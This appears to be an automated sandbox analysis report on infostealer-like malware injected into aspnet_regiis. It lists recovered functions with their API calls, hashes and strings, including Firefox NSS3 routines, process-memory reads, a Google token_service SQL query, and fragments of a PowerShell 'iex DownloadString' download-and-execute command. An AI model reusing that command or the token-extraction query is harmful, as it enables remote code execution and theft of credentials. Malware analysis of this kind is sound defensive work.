                                                                                                                                                                              • Opcode ID: 3d5241af37d42ecb7ea89561ee5910793c711431797194ba0bcef6eaffe60434
                                                                                                                                                                              • Instruction ID: ff92029f41c81ec0f83f42be3364b89dc5e1e2fc2c3e2d581fd7946816a47732
                                                                                                                                                                              • Opcode Fuzzy Hash: 3d5241af37d42ecb7ea89561ee5910793c711431797194ba0bcef6eaffe60434
                                                                                                                                                                              • Instruction Fuzzy Hash: 86C1A0B5A002599BDB10CF28DC80BDAB7B8FF48318F1441A8E94897741E775EE95CF92
                                                                                                                                                                              APIs
                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(55CEB38C), ref: 6CB82C5D
                                                                                                                                                                                • Part of subcall function 6CBE0D30: calloc.MOZGLUE ref: 6CBE0D50
                                                                                                                                                                                • Part of subcall function 6CBE0D30: TlsGetValue.KERNEL32 ref: 6CBE0D6D
                                                                                                                                                                              • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CB82C8D
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB82CE0
                                                                                                                                                                                • Part of subcall function 6CB82E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CB82CDA,?,00000000), ref: 6CB82E1E
                                                                                                                                                                                • Part of subcall function 6CB82E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CB82E33
                                                                                                                                                                                • Part of subcall function 6CB82E00: TlsGetValue.KERNEL32 ref: 6CB82E4E
                                                                                                                                                                                • Part of subcall function 6CB82E00: EnterCriticalSection.KERNEL32(?), ref: 6CB82E5E
                                                                                                                                                                                • Part of subcall function 6CB82E00: PL_HashTableLookup.NSS3(?), ref: 6CB82E71
                                                                                                                                                                                • Part of subcall function 6CB82E00: PL_HashTableRemove.NSS3(?), ref: 6CB82E84
                                                                                                                                                                                • Part of subcall function 6CB82E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CB82E96
                                                                                                                                                                                • Part of subcall function 6CB82E00: PR_Unlock.NSS3 ref: 6CB82EA9
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB82D23
                                                                                                                                                                              • CERT_IsCACert.NSS3(00000001,00000000), ref: 6CB82D30
                                                                                                                                                                              • CERT_MakeCANickname.NSS3(00000001), ref: 6CB82D3F
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB82D73
                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6CB82DB8
                                                                                                                                                                              • free.MOZGLUE ref: 6CB82DC8
                                                                                                                                                                                • Part of subcall function 6CB83E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB83EC2
                                                                                                                                                                                • Part of subcall function 6CB83E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB83ED6
                                                                                                                                                                                • Part of subcall function 6CB83E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB83EEE
                                                                                                                                                                                • Part of subcall function 6CB83E60: PR_CallOnce.NSS3(6CCE2AA4,6CBE12D0), ref: 6CB83F02
                                                                                                                                                                                • Part of subcall function 6CB83E60: PL_FreeArenaPool.NSS3 ref: 6CB83F14
                                                                                                                                                                                • Part of subcall function 6CB83E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB83F27
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3941837925-0
                                                                                                                                                                              • Opcode ID: c0349248f2c2f7ad250eff683c6a2e52814300faad4f1dcb641cbd47b071b0c5
                                                                                                                                                                              • Instruction ID: a0fc07fccb74ca313ef62c7853bad7a48313af90bf81c0117229cffc0a7092a7
                                                                                                                                                                              • Opcode Fuzzy Hash: c0349248f2c2f7ad250eff683c6a2e52814300faad4f1dcb641cbd47b071b0c5
                                                                                                                                                                              • Instruction Fuzzy Hash: 2251DE71A063629BEB009E29DC89B6F7BE5EF84348F14042CEC5993750EB31E815CB93
                                                                                                                                                                              APIs
                                                                                                                                                                              • _free.LIBCMT ref: 02A26634
                                                                                                                                                                              • _free.LIBCMT ref: 02A26642
                                                                                                                                                                              • _free.LIBCMT ref: 02A2664D
                                                                                                                                                                              • _free.LIBCMT ref: 02A26621
                                                                                                                                                                                • Part of subcall function 02A1D93B: HeapFree.KERNEL32(00000000,00000000,?,02A1D18F,00000000,02A3B6F4,02A1D1D6,02A0EEBE,?,?,02A1D2C0,02A3B6F4,?,?,02A2EC38,02A3B6F4), ref: 02A1D951
                                                                                                                                                                                • Part of subcall function 02A1D93B: GetLastError.KERNEL32(?,?,?,02A1D2C0,02A3B6F4,?,?,02A2EC38,02A3B6F4,?,?,?), ref: 02A1D963
                                                                                                                                                                              • ___free_lc_time.LIBCMT ref: 02A2666B
                                                                                                                                                                              • _free.LIBCMT ref: 02A26676
                                                                                                                                                                              • _free.LIBCMT ref: 02A2669B
                                                                                                                                                                              • _free.LIBCMT ref: 02A266B2
                                                                                                                                                                              • _free.LIBCMT ref: 02A266C1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lc_time
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3704779436-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,02A0FBE3,?,00000000,00000000,?,?), ref: 02A0F934
                                                                                                                                                                              • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,02A0FBE3,?,00000000,00000000), ref: 02A0F95E
                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 02A0F9AB
                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 02A0FA04
                                                                                                                                                                              • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 02A0FA5C
                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,02A0FBE3,?,00000000,00000000,?,?), ref: 02A0FA6D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MemoryProcessQueryReadVirtual
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 3835927879-2766056989
                                                                                                                                                                              APIs
                                                                                                                                                                              • TlsGetValue.KERNEL32(00000000,00000000,?,6CBA124D,00000001), ref: 6CB98D19
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6CBA124D,00000001), ref: 6CB98D32
                                                                                                                                                                              • PL_ArenaRelease.NSS3(?,?,?,?,?,6CBA124D,00000001), ref: 6CB98D73
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CBA124D,00000001), ref: 6CB98D8C
                                                                                                                                                                                • Part of subcall function 6CC2DD70: TlsGetValue.KERNEL32 ref: 6CC2DD8C
                                                                                                                                                                                • Part of subcall function 6CC2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC2DDB4
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CBA124D,00000001), ref: 6CB98DBA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                              • String ID: KRAM$KRAM
                                                                                                                                                                              • API String ID: 2419422920-169145855
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CBBACE6
                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CBBAD14
                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CBBAD23
                                                                                                                                                                                • Part of subcall function 6CC9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC9D963
                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6CBBAD39
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                              • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                                                                                                                              • API String ID: 332880674-3521875567
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CC90EE6
                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CC90EFA
                                                                                                                                                                                • Part of subcall function 6CB7AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CB7AF0E
                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F16
                                                                                                                                                                              • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F1C
                                                                                                                                                                              • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F25
                                                                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F2B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                                              • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                              • API String ID: 2948422844-1374795319
                                                                                                                                                                              • Opcode ID: 0342315106f231e9045af9100502df8bd51772594a5b6c3b2b067709935de26b
                                                                                                                                                                              • Instruction ID: 9fe29833d17454e5ee7b69974880b0107cd112f0410db468e414a865ac5180fd
                                                                                                                                                                              • Opcode Fuzzy Hash: 0342315106f231e9045af9100502df8bd51772594a5b6c3b2b067709935de26b
                                                                                                                                                                              • Instruction Fuzzy Hash: 410180B6A00114BBDF01AFA4DC8989B3F3DEF4A764F104064FD0A87711E631EA50DBA2
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A09BB2
                                                                                                                                                                                • Part of subcall function 02A11E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A16931,?), ref: 02A11E37
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 02A09BCF
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A09C7E
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A09C99
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpylstrlen$lstrcat$AllocLocal
                                                                                                                                                                              • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                              • API String ID: 3306365304-1713091031
                                                                                                                                                                              • Opcode ID: 92054395490697572e0c06c0ad165da3733723bb1cdc5b405ddce77bcc97f4e5
                                                                                                                                                                              • Instruction ID: aa64ca2f9ec6737154525b266ff910b1bdb9fe7f2c42fd4b2a296c0f359781d9
                                                                                                                                                                              • Opcode Fuzzy Hash: 92054395490697572e0c06c0ad165da3733723bb1cdc5b405ddce77bcc97f4e5
                                                                                                                                                                              • Instruction Fuzzy Hash: 3581F932D80219ABDF01FBA4EE85ADEB776BF04355F510020F911B71A0DF60AE998F91
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000,6CBC1444,?,00000001,?,00000000,00000000,?,?,6CBC1444,?,?,00000000,?,?), ref: 6CBC0CB3
                                                                                                                                                                                • Part of subcall function 6CC2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC2C2BF
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CBC1444,?,00000001,?,00000000,00000000,?,?,6CBC1444,?), ref: 6CBC0DC1
                                                                                                                                                                              • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CBC1444,?,00000001,?,00000000,00000000,?,?,6CBC1444,?), ref: 6CBC0DEC
                                                                                                                                                                                • Part of subcall function 6CBE0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CB82AF5,?,?,?,?,?,6CB80A1B,00000000), ref: 6CBE0F1A
                                                                                                                                                                                • Part of subcall function 6CBE0F10: malloc.MOZGLUE(00000001), ref: 6CBE0F30
                                                                                                                                                                                • Part of subcall function 6CBE0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CBE0F42
                                                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CBC1444,?,00000001,?,00000000,00000000,?), ref: 6CBC0DFF
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CBC1444,?,00000001,?,00000000), ref: 6CBC0E16
                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CBC1444,?,00000001,?,00000000,00000000,?), ref: 6CBC0E53
                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,6CBC1444,?,00000001,?,00000000,00000000,?,?,6CBC1444,?,?,00000000), ref: 6CBC0E65
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CBC1444,?,00000001,?,00000000,00000000,?), ref: 6CBC0E79
                                                                                                                                                                                • Part of subcall function 6CBD1560: TlsGetValue.KERNEL32(00000000,?,6CBA0844,?), ref: 6CBD157A
                                                                                                                                                                                • Part of subcall function 6CBD1560: EnterCriticalSection.KERNEL32(?,?,?,6CBA0844,?), ref: 6CBD158F
                                                                                                                                                                                • Part of subcall function 6CBD1560: PR_Unlock.NSS3(?,?,?,?,6CBA0844,?), ref: 6CBD15B2
                                                                                                                                                                                • Part of subcall function 6CB9B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CBA1397,00000000,?,6CB9CF93,5B5F5EC0,00000000,?,6CBA1397,?), ref: 6CB9B1CB
                                                                                                                                                                                • Part of subcall function 6CB9B1A0: free.MOZGLUE(5B5F5EC0,?,6CB9CF93,5B5F5EC0,00000000,?,6CBA1397,?), ref: 6CB9B1D2
                                                                                                                                                                                • Part of subcall function 6CB989E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CB988AE,-00000008), ref: 6CB98A04
                                                                                                                                                                                • Part of subcall function 6CB989E0: EnterCriticalSection.KERNEL32(?), ref: 6CB98A15
                                                                                                                                                                                • Part of subcall function 6CB989E0: memset.VCRUNTIME140(6CB988AE,00000000,00000132), ref: 6CB98A27
                                                                                                                                                                                • Part of subcall function 6CB989E0: PR_Unlock.NSS3(?), ref: 6CB98A35
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1601681851-0
                                                                                                                                                                              • Opcode ID: 9b86db9cfa342e48d50d0280266f01cb62e6574c77e48ff1297b5b4f76570844
                                                                                                                                                                              • Instruction ID: 6e11a2983b8fe4721ad1ef8752500fad50e3f753efe74a05e89d4747b3bc0392
                                                                                                                                                                              • Opcode Fuzzy Hash: 9b86db9cfa342e48d50d0280266f01cb62e6574c77e48ff1297b5b4f76570844
                                                                                                                                                                              • Instruction Fuzzy Hash: B851A8F5E002916FEB009F64EC81AAF37A8EF45618F154464ED099B712FB31ED1987A3
                                                                                                                                                                              APIs
                                                                                                                                                                              • sqlite3_value_text.NSS3(?,?), ref: 6CB76ED8
                                                                                                                                                                              • sqlite3_value_text.NSS3(?,?), ref: 6CB76EE5
                                                                                                                                                                              • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6CB76FA8
                                                                                                                                                                              • sqlite3_value_text.NSS3(00000000,?), ref: 6CB76FDB
                                                                                                                                                                              • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6CB76FF0
                                                                                                                                                                              • sqlite3_value_blob.NSS3(?,?), ref: 6CB77010
                                                                                                                                                                              • sqlite3_value_blob.NSS3(?,?), ref: 6CB7701D
                                                                                                                                                                              • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6CB77052
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1920323672-0
                                                                                                                                                                              • Opcode ID: 14a3a2973cc8d7cd4f8a08f1a05a85c48203d1a7c2e5d3f62baa9709eda86c06
                                                                                                                                                                              • Instruction ID: e0106ae3175b3b6d3f4990fac7f4f843d37bbd10f1dedf43c25ed83f1a784b60
                                                                                                                                                                              • Opcode Fuzzy Hash: 14a3a2973cc8d7cd4f8a08f1a05a85c48203d1a7c2e5d3f62baa9709eda86c06
                                                                                                                                                                              • Instruction Fuzzy Hash: 22619FB1E042868FDF11CF65C8407EEB7B2EF45208F184165DC25ABB51E7329915CBB1
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 02A12EC0
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\ProgramData\, xrefs: 02A12DA3
                                                                                                                                                                              • .ps1, xrefs: 02A12DF3
                                                                                                                                                                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 02A12E18
                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 02A12E5B
                                                                                                                                                                              • ')", xrefs: 02A12E13
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              • API String ID: 2215929589-1989157005
                                                                                                                                                                              • Opcode ID: 4b61772ceebbe0bedbbb8e36d6494586df91822af0944666a9978e74ac6d3c43
                                                                                                                                                                              • Instruction ID: 4ef798be1fcda5fc4b512b64b152fc1270dae58a45a312d8226b064fbabbec30
                                                                                                                                                                              • Opcode Fuzzy Hash: 4b61772ceebbe0bedbbb8e36d6494586df91822af0944666a9978e74ac6d3c43
                                                                                                                                                                              • Instruction Fuzzy Hash: D941D931D80228ABCF11EFA4EE85ACDB7BABF04750F504061E914B7150DF70AE4A8F94
                                                                                                                                                                              APIs
                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CBCAB3E,?,?,?), ref: 6CBCAC35
                                                                                                                                                                                • Part of subcall function 6CBACEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CBACF16
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CBCAB3E,?,?,?), ref: 6CBCAC55
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE10F3
                                                                                                                                                                                • Part of subcall function 6CBE10C0: EnterCriticalSection.KERNEL32(?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE110C
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1141
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PR_Unlock.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1182
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE119C
                                                                                                                                                                              • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CBCAB3E,?,?), ref: 6CBCAC70
                                                                                                                                                                                • Part of subcall function 6CBAE300: TlsGetValue.KERNEL32 ref: 6CBAE33C
                                                                                                                                                                                • Part of subcall function 6CBAE300: EnterCriticalSection.KERNEL32(?), ref: 6CBAE350
                                                                                                                                                                                • Part of subcall function 6CBAE300: PR_Unlock.NSS3(?), ref: 6CBAE5BC
                                                                                                                                                                                • Part of subcall function 6CBAE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CBAE5CA
                                                                                                                                                                                • Part of subcall function 6CBAE300: TlsGetValue.KERNEL32 ref: 6CBAE5F2
                                                                                                                                                                                • Part of subcall function 6CBAE300: EnterCriticalSection.KERNEL32(?), ref: 6CBAE606
                                                                                                                                                                                • Part of subcall function 6CBAE300: PORT_Alloc_Util.NSS3(?), ref: 6CBAE613
                                                                                                                                                                              • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CBCAC92
                                                                                                                                                                              • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CBCAB3E), ref: 6CBCACD7
                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6CBCAD10
                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CBCAD2B
                                                                                                                                                                                • Part of subcall function 6CBAF360: TlsGetValue.KERNEL32(00000000,?,6CBCA904,?), ref: 6CBAF38B
                                                                                                                                                                                • Part of subcall function 6CBAF360: EnterCriticalSection.KERNEL32(?,?,?,6CBCA904,?), ref: 6CBAF3A0
                                                                                                                                                                                • Part of subcall function 6CBAF360: PR_Unlock.NSS3(?,?,?,?,6CBCA904,?), ref: 6CBAF3D3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2926855110-0
                                                                                                                                                                              • Opcode ID: d214edb0653627ce2a9cac3bc205370e2addf1a2745a8273381c69c10418798c
                                                                                                                                                                              • Instruction ID: d7904413b49efbc8b3a6ad4f489718736c2122807fc8c59ae88b3af04ca93d2a
                                                                                                                                                                              • Opcode Fuzzy Hash: d214edb0653627ce2a9cac3bc205370e2addf1a2745a8273381c69c10418798c
                                                                                                                                                                              • Instruction Fuzzy Hash: C2313BB1F006595FEB008F69CC409AF77B6EF8471CB188128E81597740EB31ED16CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_Now.NSS3 ref: 6CBA8C7C
                                                                                                                                                                                • Part of subcall function 6CC49DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC90A27), ref: 6CC49DC6
                                                                                                                                                                                • Part of subcall function 6CC49DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC90A27), ref: 6CC49DD1
                                                                                                                                                                                • Part of subcall function 6CC49DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC49DED
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBA8CB0
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CBA8CD1
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBA8CE5
